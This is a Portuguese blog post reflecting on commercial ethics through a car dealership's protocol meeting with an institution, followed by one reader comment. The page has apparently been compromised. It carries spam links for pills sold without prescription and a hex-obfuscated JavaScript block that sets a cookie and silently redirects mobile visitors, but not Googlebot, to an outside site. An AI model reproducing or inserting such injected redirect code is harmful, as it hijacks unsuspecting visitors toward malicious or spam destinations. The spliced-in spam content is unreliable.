Posted by IN / 1 response

A ética comercial é um desejo, uma prática e uma obrigação para todo o profissional desta actividade.

7 March 2016

buy a cheat medications without rx – http://rizkipramudiacivil.mhs.narotama.ac.id/2016/11/30/buy-a-cheat-medications-without-rx/ Etica_1

 

Gostei do que vi, do que ouvi e sobretudo senti-me muito bem. Tive que conter a vontade de, mesmo em plena reunião,  dizer um merecido .. Uauuu!

… o vendedor tinha marcado esta reunião na sede desta instituição. Entusiasmados, lá nos dirigimos para o local. Mais um protocolo RH, que, segundo o vendedor, poderia abranger uns largos milhares de “associados” desta Instituição.

Chegada emotiva. Já nos aguardavam de sorrisos francos e abertos.

A caminho da sala de reuniões todas as informações seriam importantes para o tal “quebrar” de gelo e potenciação da energia necessária para que o “clima” pudesse ser positivo.

Um poster aqui, uma taça ali e uma subida de escadas, que previsivelmente se faria em 30 segundos, acabaram por criar a oportunidade para uns largos e alegres minutos.

Tudo a correr bem! Do nosso lado eramos 3, do lado da instituição dois representantes com poderes para o ato.

O Vendedor fez as apresentações, um breve resumo do histórico até este momento anunciando os objetivos desejados para esta reunião:

– “Assim os vossos associados poderão de acordo com as condições que …. Ter acesso a…

O meu papel foi fazer o enquadramento dos protocolos, procurar “aquecer” (como estava combinado) de forma a poder avançar para as respostas.

Tudo a correr ultrapassando as nossas (minhas) expetativas. O claro interesse da Instituição, o ambiente de alegria e boa disposição.

Que ricos 30 minutos.

O Histórico da instituição cheio de momentos nobres, espetáculos, vitórias, que na pessoa do Presidente nos faziam sentir como se os desejássemos ter vivido. O vendedor com o seu jeito altamente pragmático procurava avançar com as suas propostas:

— “por isso achamos que … e propomos que .. e….” – O seu entusiasmo deixava transparecer uma alegria que denunciava a antecipação de um futuro bem risonho.

O Chefe de vendas (comercial) reformulava, reavivava  e avançava a galope para a tentativa de selar o dito protocolo:

– “Certo, e do vosso lado quem será a pessoa que irá assinar este protocolo?

Seria mesmo o presidente, aqui presente. Pessoa de alto valor social, num misto de Pai e Filho da instituição, dava sinais de alegria por mais um protocolo para os seus “colegas” e amigos membros desta organização quase secular.

Tanto mas tanto… que mesmo só quem vive o que vivemos.. sabe e sente o quanto vale a Relação…

Poderia chamar “acelerador tónico”, como se diz em Psicologia, à tal força energética que transforma uns aparentes “terráqueos” em verdadeiros seres humanos que sabem e sentem que o “sonho comanda a vida e sempre que o homem sonha o mundo pula e avança como bola colorida nas mãos de uma criança”

.. e quando tudo parecia ter chegado àquele momento da suposta concordância para a formalização do protocolo, com valores interessantes quer para a compra dos automóveis quer para descontos nos serviços, eis que o nosso Chefe de vendas (comercial) toma a palavra sorrindo e com aquele ar de “deixa lá ver como vou abordar esta questão” lá procurou verbalizar:

– “Agora e por último um assunto que para todos nós é muito importante. Nós, eu e o meu colega (aponta o vendedor), procuramos chegar a vós, pela importância desta instituição, para podermos também proporcionar aos seus associados condições especiais logo no acesso para a compra de um … (MARCA) . Anteriormente, com o meu Director, procurámos chegar a condições muito interessantes para a compra dos vossos … (MARCA)..

O que solicitamos é um esforço de todos, para que a comunicação com os associados possa ser o mais eficaz possível procurando com isso reduzir o risco de algumas situações, infelizmente já vividas no passado, ou seja, na hora da verdade um determinado associado “pegar” no nosso protocolo e dirigir-se a um outro Concessionário.

A nossa pretensão é que nos procure, nos consulte, independentemente de poderem ir a outra empresa procurando negociar depois os seus valores.

Pretendemos ser os primeiros, embora eventualmente possamos não ser os únicos!

Ainda o Chefe de Vendas não tinha acabado o seu discurso e já o presidente interrompendo toma a palavra quase em jeito de “declaração de compromisso”:

– “Mas sem dúvida! Do nosso lado vamos promover este protocolo para que fique clara a importância do vosso papel e dinâmica ao virem ter connosco para podermos ter mais uma oferta interessante para os nossos associados”.

O que está a fazer este Chefe de Vendas?

A exercer a Ética. A nobre missão da Inteligência ao serviço da convivialidade entre os seres.

Ética é a filosofia da Moral. Aqui o exercício da moralização da atividade.

Não equiparamos este comportamento a uma visão corporativista mas sim o exercício da “moralidade” entre os profissionais e clientes.

Este chefe de vendas está a exercer a sua função que é também procurar contribuir para a moralização dos comportamentos não só dos seus colegas concorrentes como dos compradores.

Praticar a Ética não é regular, mas sim procurar contribuir para a moralização dos costumes.

A convivialidade entre os povos.

 

acquire at a low figure generic pills without prescription Etica_2

 

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

one response to A ética comercial é um desejo, uma prática e uma obrigação para todo o profissional desta actividade.

  • Fernando Silva says on May 30, 2016 at 8:45 am

    Ética é efectivamente a inteligência ao serviço da convivialidade.

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>